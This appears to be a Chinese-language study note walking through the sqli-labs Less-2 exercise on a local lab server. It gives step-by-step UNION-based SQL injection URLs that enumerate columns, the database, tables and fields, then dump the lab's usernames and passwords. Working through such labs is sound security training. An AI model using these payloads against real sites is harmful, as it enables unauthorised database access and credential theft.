url:http://10.0.2.15/sqli/Less-2/?id=1
显示：用户名和密码
url:http://10.0.2.15/sqli/Less-2/?id=1%27
显示：报错' ' LIMIT 0,1 '
即正常情况下（id=1）时应是: 1 limit 0,1
故推测sql：select username,password from 用户表 where id = 用户输入 limit 0,1;

拆解：
1.字段数
url：http://10.0.2.15/sqli/Less-2/?id=1 order by 3 --
返回正常，说明字段数至少为3
url：http://10.0.2.15/sqli/Less-2/?id=1 order by 4 --
报错，说明字段数为3

2.数据库名
url：http://10.0.2.15/sqli/Less-2/?id=0
没有返回用户名和密码，说明不含有id=0的记录
url：http://10.0.2.15/sqli/Less-2/?id=0 UNION SELECT 1,database(),3
得知数据库名为security

3.表名
url：http://10.0.2.15/sqli/Less-2/?id=0 UNION SELECT 1,group_concat(table_name),3 from information_schema.tables where table_schema = 'security' --+
security中的表名为users,uagents,emails,referers，推测users存储用户名和密码

4.字段名
url：http://10.0.2.15/sqli/Less-2/?id=0 UNION SELECT 1,group_concat(column_name),3 from information_schema.columns where table_name = 'users' --+
users中字段名为id,username,password,USER,CURRENT_CONNECTIONS,TOTAL_CONNECTIONS
推测username和password表示用户名和密码

5.字段值
url：http://10.0.2.15/sqli/Less-2/?id=0 UNION SELECT 1,group_concat(username),group_concat(password) from users --+
 Your Login name:Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4
Your Password:Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4 
